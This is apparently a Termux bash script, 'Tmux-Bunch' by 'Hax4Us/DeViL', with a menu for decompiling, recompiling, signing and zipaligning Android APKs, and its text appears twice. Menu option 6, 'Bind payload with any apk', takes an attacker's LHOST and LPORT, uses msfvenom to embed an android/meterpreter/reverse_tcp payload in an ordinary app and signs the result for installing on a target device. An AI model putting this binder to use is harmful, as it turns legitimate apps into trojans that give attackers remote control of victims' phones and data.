#!/data/data/com.termux/files/usr/bin/bash
dir=`pwd`
subs="which file ? Enter number of choice or 'x' to exit"
esit="are you sure ? press ENTER to exit"
return="ENTER to return to TMUX-BUNCH menu"
DIRECTORY="/data/data/com.termux/files/usr/share/figlet"
TMP="Hax4Us(devil) Tmux-Bunch is a first tool for complete apk modding in TERMUX."
VERSION="VERSION 2.1"
if [ ! -d "$DIRECTORY" ]; then
apt update && apt install figlet
fi
figlet -f mini ..........TMUX-BUNCH..........
echo
echo
echo "ENTER to continue"
read garbage
echo $TMP
echo
echo $VERSION
echo
echo "   --------Hax4Us-----DeViL-----Don't----CopY--------"
echo
echo "WARNING :- Don't Try To Reupload , Modify , Or Resell Otherwise I Will Report You"
echo
echo "You Can Reuse Or Give My Tool To Anyone or users But You Will Have To Take Permission From Me"
echo
echo "   -------------- LICENSE--INCLUDED----------------"
echo
echo "          ~~~~~~~~~~~TMUX---BUNCH~~~~~~~~~~~"
echo
echo "                     APK MODDING          "
echo "-----------------------------------------------------"
echo
echo
echo "  ----------------------DeViL-----------------------"
echo "-------------------------------------------------------"
echo "$TMP"
echo
echo "$VERSION"
echo "----------------------------------------------------"
echo
echo "Place apps in 'decompiler' folder."
echo
echo "-------------------------------------------------"
echo
echo "1)Install frameworks-important for recompiling!!"
echo "2)Decompile apk"
echo "3)Recompile"
echo "4)Sign apk-important for installing"
echo "5)Zipalign"
echo "6)Bind payload with any apk"
echo "7)About"
echo "8)Credits"
echo "9)Exit"
echo
echo "______________________"
echo
echo "pick your option"
read k
case "$k" in
1) echo
echo
echo
echo "You must install the framework-res.apk"
echo "from the /system/frameworks folder of your device."
echo
echo "press ENTER to continue"
echo
read garbagee
cd $dir/frameworks
ls | cat -n
echo
echo "which file ? Enter number of choice or 'x' to exit"
read choice
if [ $choice = 'x' ] ; then
echo "are you sure ? press ENTER to exit"
read garbageee
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool if $dir/frameworks/$OUTPUT -p $dir
echo
echo
echo "_______________________"
echo
echo "ENTER to return to TMUX-BUNCH menu"
read l
fi
cd $dir
./tmuxbunch ;;

2) echo
echo
echo "Decompiling an apk"
echo
echo "press ENTER to continue"
echo
read o
cd $dir/decompiler
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ] ; then
echo "$esit"
read e
exit
else
cd $dir/decompiler
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool d $dir/decompiler/$OUTPUT -o $dir/recompiler/$OUTPUT
echo
echo
echo
echo "________________________________________"
echo
echo "Decompiled files in 'recompiler' folder. You can now play with apk source code"
echo "$return"
read s
fi
cd $dir
./tmuxbunch ;;

3) echo
echo
echo
echo "This will compile the source code"
echo "The app can't be install until you sign it"
echo
echo "press ENTER to continue"
echo
read h
cd $dir/recompiler
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ]
then
echo "$esit"
read p
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool b --aapt $dir/.bunch/openjdk/bin/aapt $dir/recompiler/$OUTPUT -o $dir/unsign/$OUTPUT
echo
echo
echo
echo "________________________________________"
echo
echo "recompiled apk in 'unsign' folder. Sign apk before installing"
echo
echo "$return"
read a
fi
cd $dir
./tmuxbunch ;;

4) echo
echo
echo
echo "Sign the apk"
echo "App will be ready to install after you sign it"
echo
echo
echo "press ENTER to continue"
echo
read n
cd $dir/unsign
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ] ; then
echo "$esit"
read d
exit
else
echo "signing apk ......."
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.signapk publickey.x509.pem publickey.pk8 $dir/unsign/$OUTPUT $dir/sign/signed_$OUTPUT
echo
echo
echo
echo "_______________________________________"
echo
echo "signed apk in 'sign' folder"
echo
echo "$return"
read lokesh
fi
cd $dir
./tmuxbunch ;;

5) echo
echo
echo
echo "place apk to be zipaligned in 'Zipalign' folder"
echo "press ENTER to continue"
read lokesh
cd $dir/zipalign
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x'] ; then
echo "$esit"
read pandey
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.zzipalign 4 $dir/zipalign/$OUTPUT $dir/zipaligned_$OUTPUT
echo
echo
echo
echo "________________________________________"
echo
echo "zipaligned apk in 'zipalign' folder"
echo
echo "$return"
read devil
fi
cd $dir
./tmuxbunch
;;

6) echo
echo "[*] Make sure , Metasploit is installed"
echo
echo "[*] Please first move or copy your target apk file into binder folder"
echo
echo "[*] Please wait ..."
echo
cd $HOME/Tmux-Bunch/binder
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ] ; then
echo "$esit"
read jaiho
exit
else
OUTPUT=`ls | sed -n $choice'p'`
mv $dir/binder/$OUTPUT $HOME/metasploit-framework
echo "[*] Please enter following details :-"
echo "[*] LHOST :-"
read lhost
echo "[*] LPORT :-"
read lport
echo "[*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP"
read output12
echo
echo "[*] Please wait while binding......."
echo
cd $HOME/metasploit-framework
./msfvenom -x $OUTPUT -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport

echo "signing apk ......."
mv $dir/unsign/output.apk $dir/unsign/$output12.apk
sh $dir/.signapk publickey.x509.pem publickey.pk8 $dir/unsign/$output12.apk $dir/embout/$output12.apk
rm $dir/unsign/$output12.apk
fi
echo
echo "We will met again :D , have a payload day..!"
echo
echo "press ENTER for main menu"
read continued
cd $dir
./tmuxbunch
;;
7) echo
echo
echo
echo "                         About"
echo "     ----------------------------------------------"
echo
echo "I am trying to do with this tool is provide a user friendly program for noobs so they can play with apks before they really understand the process.This tool is also useful for experienced users that don't want to type the same command again and again."
echo
echo "ENTER to continue"
read continue
echo
echo
echo "------Creator Of This Script Or Tool ::---->> DeViL----"
echo
figlet -f mini ..........TMUX--BUNCH..........
echo
echo
echo "            ~~~~~~~TMUX---BUNCH~~~~~~~~"
echo
echo "ENTER to continue"
read devil
cd $dir
./tmuxbunch
;;

8) echo "       -----------Credits Goes To------------"
echo
echo "1)Openjdk Creators"
echo "2)Apktool Creator(ibotpeaches)"
echo "3)Great Tools (signapk , zipalign , apktool , openjdk)"
echo "4)DeViL(Hax4Us) --- Collector/Script/Tool-Creator"
echo
echo "ENTER to continue"
read devil
cd $dir
./tmuxbunch
;;
9) echo "Bye Bye..!!"
exit
;;
esac
#!/data/data/com.termux/files/usr/bin/bash
dir=`pwd`
subs="which file ? Enter number of choice or 'x' to exit"
esit="are you sure ? press ENTER to exit"
return="ENTER to return to TMUX-BUNCH menu"
DIRECTORY="/data/data/com.termux/files/usr/share/figlet"
TMP="Hax4Us(devil) Tmux-Bunch is a first tool for complete apk modding in TERMUX."
VERSION="VERSION 2.1"
if [ ! -d "$DIRECTORY" ]; then
apt update && apt install figlet
fi
figlet -f mini ..........TMUX-BUNCH..........
echo
echo
echo "ENTER to continue"
read garbage
echo $TMP
echo
echo $VERSION
echo
echo "   --------Hax4Us-----DeViL-----Don't----CopY--------"
echo
echo "WARNING :- Don't Try To Reupload , Modify , Or Resell Otherwise I Will Report You"
echo
echo "You Can Reuse Or Give My Tool To Anyone or users But You Will Have To Take Permission From Me"
echo
echo "   -------------- LICENSE--INCLUDED----------------"
echo
echo "          ~~~~~~~~~~~TMUX---BUNCH~~~~~~~~~~~"
echo
echo "                     APK MODDING          "
echo "-----------------------------------------------------"
echo
echo
echo "  ----------------------DeViL-----------------------"
echo "-------------------------------------------------------"
echo "$TMP"
echo
echo "$VERSION"
echo "----------------------------------------------------"
echo
echo "Place apps in 'decompiler' folder."
echo
echo "-------------------------------------------------"
echo
echo "1)Install frameworks-important for recompiling!!"
echo "2)Decompile apk"
echo "3)Recompile"
echo "4)Sign apk-important for installing"
echo "5)Zipalign"
echo "6)Bind payload with any apk"
echo "7)About"
echo "8)Credits"
echo "9)Exit"
echo
echo "______________________"
echo
echo "pick your option"
read k
case "$k" in
1) echo
echo
echo
echo "You must install the framework-res.apk"
echo "from the /system/frameworks folder of your device."
echo
echo "press ENTER to continue"
echo
read garbagee
cd $dir/frameworks
ls | cat -n
echo
echo "which file ? Enter number of choice or 'x' to exit"
read choice
if [ $choice = 'x' ] ; then
echo "are you sure ? press ENTER to exit"
read garbageee
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool if $dir/frameworks/$OUTPUT -p $dir
echo
echo
echo "_______________________"
echo
echo "ENTER to return to TMUX-BUNCH menu"
read l
fi
cd $dir
./tmuxbunch ;;

2) echo
echo
echo "Decompiling an apk"
echo
echo "press ENTER to continue"
echo
read o
cd $dir/decompiler
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ] ; then
echo "$esit"
read e
exit
else
cd $dir/decompiler
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool d $dir/decompiler/$OUTPUT -o $dir/recompiler/$OUTPUT
echo
echo
echo
echo "________________________________________"
echo
echo "Decompiled files in 'recompiler' folder. You can now play with apk source code"
echo "$return"
read s
fi
cd $dir
./tmuxbunch ;;

3) echo
echo
echo
echo "This will compile the source code"
echo "The app can't be install until you sign it"
echo
echo "press ENTER to continue"
echo
read h
cd $dir/recompiler
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ]
then
echo "$esit"
read p
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.apktool b --aapt $dir/.bunch/openjdk/bin/aapt $dir/recompiler/$OUTPUT -o $dir/unsign/$OUTPUT
echo
echo
echo
echo "________________________________________"
echo
echo "recompiled apk in 'unsign' folder. Sign apk before installing"
echo
echo "$return"
read a
fi
cd $dir
./tmuxbunch ;;

4) echo
echo
echo
echo "Sign the apk"
echo "App will be ready to install after you sign it"
echo
echo
echo "press ENTER to continue"
echo
read n
cd $dir/unsign
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ] ; then
echo "$esit"
read d
exit
else
echo "signing apk ......."
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.signapk publickey.x509.pem publickey.pk8 $dir/unsign/$OUTPUT $dir/sign/signed_$OUTPUT
echo
echo
echo
echo "_______________________________________"
echo
echo "signed apk in 'sign' folder"
echo
echo "$return"
read lokesh
fi
cd $dir
./tmuxbunch ;;

5) echo
echo
echo
echo "place apk to be zipaligned in 'Zipalign' folder"
echo "press ENTER to continue"
read lokesh
cd $dir/zipalign
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x'] ; then
echo "$esit"
read pandey
exit
else
OUTPUT=`ls | sed -n $choice'p'`
sh $dir/.zzipalign 4 $dir/zipalign/$OUTPUT $dir/zipaligned_$OUTPUT
echo
echo
echo
echo "________________________________________"
echo
echo "zipaligned apk in 'zipalign' folder"
echo
echo "$return"
read devil
fi
cd $dir
./tmuxbunch
;;

6) echo
echo "[*] Make sure , Metasploit is installed"
echo
echo "[*] Please first move or copy your target apk file into binder folder"
echo
echo "[*] Please wait ..."
echo
cd $HOME/Tmux-Bunch/binder
ls | cat -n
echo
echo
echo "$subs"
read choice
if [ $choice = 'x' ] ; then
echo "$esit"
read jaiho
exit
else
OUTPUT=`ls | sed -n $choice'p'`
mv $dir/binder/$OUTPUT $HOME/metasploit-framework
echo "[*] Please enter following details :-"
echo "[*] LHOST :-"
read lhost
echo "[*] LPORT :-"
read lport
echo "[*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP"
read output12
echo
echo "[*] Please wait while binding......."
echo
cd $HOME/metasploit-framework
./msfvenom -x $OUTPUT -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport

echo "signing apk ......."
mv $dir/unsign/output.apk $dir/unsign/$output12.apk
sh $dir/.signapk publickey.x509.pem publickey.pk8 $dir/unsign/$output12.apk $dir/embout/$output12.apk
fi
echo
echo "We will met again :D , have a payload day..!"
echo
echo "press ENTER for main menu"
read continued
cd $dir
./tmuxbunch
;;
7) echo
echo
echo
echo "                         About"
echo "     ----------------------------------------------"
echo
echo "I am trying to do with this tool is provide a user friendly program for noobs so they can play with apks before they really understand the process.This tool is also useful for experienced users that don't want to type the same command again and again."
echo
echo "ENTER to continue"
read continue
echo
echo
echo "------Creator Of This Script Or Tool ::---->> DeViL----"
echo
figlet -f mini ..........TMUX--BUNCH..........
echo
echo
echo "            ~~~~~~~TMUX---BUNCH~~~~~~~~"
echo
echo "ENTER to continue"
read devil
cd $dir
./tmuxbunch
;;

8) echo "       -----------Credits Goes To------------"
echo
echo "1)Openjdk Creators"
echo "2)Apktool Creator(ibotpeaches)"
echo "3)Great Tools (signapk , zipalign , apktool , openjdk)"
echo "4)DeViL(Hax4Us) --- Collector/Script/Tool-Creator"
echo
echo "ENTER to continue"
read devil
cd $dir
./tmuxbunch
;;
9) echo "Bye Bye..!!"
exit
;;
esac
